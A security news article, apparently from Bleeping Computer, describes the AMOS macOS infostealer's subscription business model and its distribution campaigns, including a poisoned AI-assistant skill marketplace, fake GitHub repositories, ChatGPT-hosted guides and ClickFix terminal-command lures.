AMOS Infostealer Targets macOS via Popular AI App
▼ Summary
– Modern infostealers like AMOS are foundational data collection engines for a mature cybercrime economy, harvesting and selling digital identities to fuel fraud and further attacks.
– These campaigns rely heavily on adaptive social engineering, abusing trusted platforms, search engines, and AI software trends to trick users into executing the malware themselves.
– The AMOS infostealer operates as a Malware-as-a-Service, with developers, distributors, and log buyers forming a structured supply chain that industrializes infection and data monetization.
– Distributors drive campaign evolution using tactics like SEO poisoning, fake software installers, and abusing platforms like GitHub, ChatGPT, and AI agent marketplaces to disseminate the malware.
– Once executed, the stealer rapidly extracts credentials, sessions, and sensitive files from a victim’s system, creating logs that are sold as a commodity for account takeover and other criminal operations.
The digital threat landscape is increasingly dominated by a sophisticated cybercrime economy, with infostealer malware like AMOS acting as a primary engine for harvesting and selling stolen identities. These tools are far more than simple viruses; they are critical data collection systems that fuel a vast underground market. Credentials, financial information, and session cookies stolen by these programs are packaged and sold to other criminals, who then launch account takeovers, fraud, and further network intrusions. The effectiveness of these campaigns hinges on highly adaptive social engineering, where attackers constantly shift tactics to exploit new technology trends, trusted platforms, and popular software, including the latest AI applications, to deceive users into installing the malware themselves.
A recent report underscores the expanding impact of this identity exposure on enterprises. As a case study, the AMOS infostealer illustrates the operational model of this modern threat, evolving from its initial sightings to large-scale campaigns targeting specific user communities. Once executed on a victim’s Mac, this type of malware acts swiftly, scouring browsers, system credential stores, cryptocurrency wallets, and local files to extract and exfiltrate any valuable data it can find.
The most recent campaign, dubbed ClawHavoc, demonstrates this opportunistic adaptation. Attackers targeted the ecosystem of a popular personal AI assistant, poisoning its skill marketplace. They uploaded what appeared to be legitimate add-ons for tasks like cryptocurrency management or productivity. When users installed these skills, the hidden AMOS payload activated, stealing a wide array of sensitive information. This incident highlights how emerging AI agent platforms can become high-risk distribution channels if their marketplaces lack rigorous security vetting.
AMOS first emerged in mid-2023, advertised on Telegram channels with capabilities including password exfiltration from the Mac keychain, browser session theft, and crypto wallet data harvesting. Available for a monthly subscription paid in cryptocurrency, it quickly became a staple in the underground ecosystem. Threat actors now actively purchase “stealer logs”, the data packages output by AMOS and similar malware, to use as initial access for their own schemes, such as cryptocurrency wallet theft.
The methods for distributing AMOS are varied and cunning. Beyond traditional phishing emails and trojanized software installers, attackers have launched notable campaigns targeting specific groups. One operation focused on LastPass users, creating fraudulent GitHub repositories that impersonated over one hundred well-known software brands. Using search engine optimization (SEO) poisoning, attackers pushed these malicious repositories to the top of search results, leading victims to pages that socially engineered them into running terminal commands that downloaded the AMOS payload.
AI-driven hype has proven to be a particularly effective lure. Prior to the ClawHavoc campaign, attackers used OpenAI’s shared chat feature to host malicious installation guides on the official chatgpt.com domain. Victims reached these guides through paid search ads promoting a fake “ChatGPT Atlas browser for macOS,” and were again instructed to run a terminal command, effectively tricking them into executing the malware themselves.
More traditional distribution still plays a major role. Fake installers for popular software like Adobe Photoshop or Microsoft Office are common, often distributed through malvertising campaigns on platforms like Google Ads that lead to spoofed download sites. A growing tactic is the “ClickFix” method, where users are guided through a series of steps, ultimately pasting a malicious command into the macOS Terminal themselves. This approach bypasses technical exploits entirely, relying instead on manipulating user trust.
The business model behind AMOS is a textbook example of Malware-as-a-Service (MaaS). Developers maintain and lease the stealer platform to affiliates, who then handle distribution through their chosen social engineering channels. The stolen data logs are sold to specialized downstream criminals, such as access brokers or fraudsters, creating a multi-stage revenue pipeline. This industrialized model turns each infection into a commodity, with different actors specializing in development, distribution, and final monetization.
While the core malware capabilities evolve slowly, the distributors are the true innovators, constantly refining their psychological lures and choosing new targets. Their adaptability in abusing trusted platforms and trends, from AI tools to password managers, is what makes infostealers a persistent and scalable foundation for today’s cybercrime.
(Source: Bleeping Computer)
